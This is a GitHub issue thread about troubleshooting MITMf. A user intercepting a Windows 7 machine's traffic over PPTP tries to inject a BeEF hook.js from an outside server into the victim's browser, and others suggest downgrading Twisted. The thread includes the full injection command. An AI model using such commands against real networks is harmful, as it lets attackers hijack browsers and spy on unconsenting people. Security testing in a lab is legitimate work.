### ISSUE TITLE
PPTP mitm + MITMf inject - no response from MITMf

### ISSUE THREAD

**Issue by maassander** [byt3bl33d3r/MITMf#289]
I am working on something where I use a PPTP connection between my Kali OS and a Windows 7 box. This way I am able to create a MITM situation and so far I get the traffic from the W7box through very nicely. My next step would be to inject a BeEF hook into this traffic I am intercepting so I can launch an attack through the browser. So I was thinking this command would do the trick:
`mitmf -i eth0 --inject --js-url http://*.*.*.*:3000/hook.js`
But after I execute it, I get no response from MITMf or BeEf giving me something to work with. When I added `--log-level debug` nothing changed so I have no idea what is going on. 

I tried the following things:
* Reinstalled MITMf according to https://github.com/byt3bl33d3r/MITMf/wiki/Installation - no result
* Checked if I could connect to the hook.js - no problem (saw the code appear)
* Tried `-i ppp0` - of course no mac address.. so no result

I can't figure out what the problem is exactly so any suggestions?

**Comment by arslevsh** [comment]
hi, maassander!
Try to check this topic https://github.com/byt3bl33d3r/MITMf/issues/287
I solved my issues after downgrading Twisted from 16.0.0 to 15.5.0

**Comment by maassander** [comment]
I removed Twisted and installed the 15.5.0 version but I notice no difference, could I have done anything wrong with the installation and how can I check that?

when I do:
```
python
>>> import twisted
>>> print twisted.version
```
I get the following output
`[twisted, version 15.5.0]`
So I think that should be fine, any other suggestions?

**Comment by byt3bl33d3r** [comment]
Closing since you didn't follow the guidelines for submitting a bug report. Please see the wiki [here](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) on how to properly report a bug.
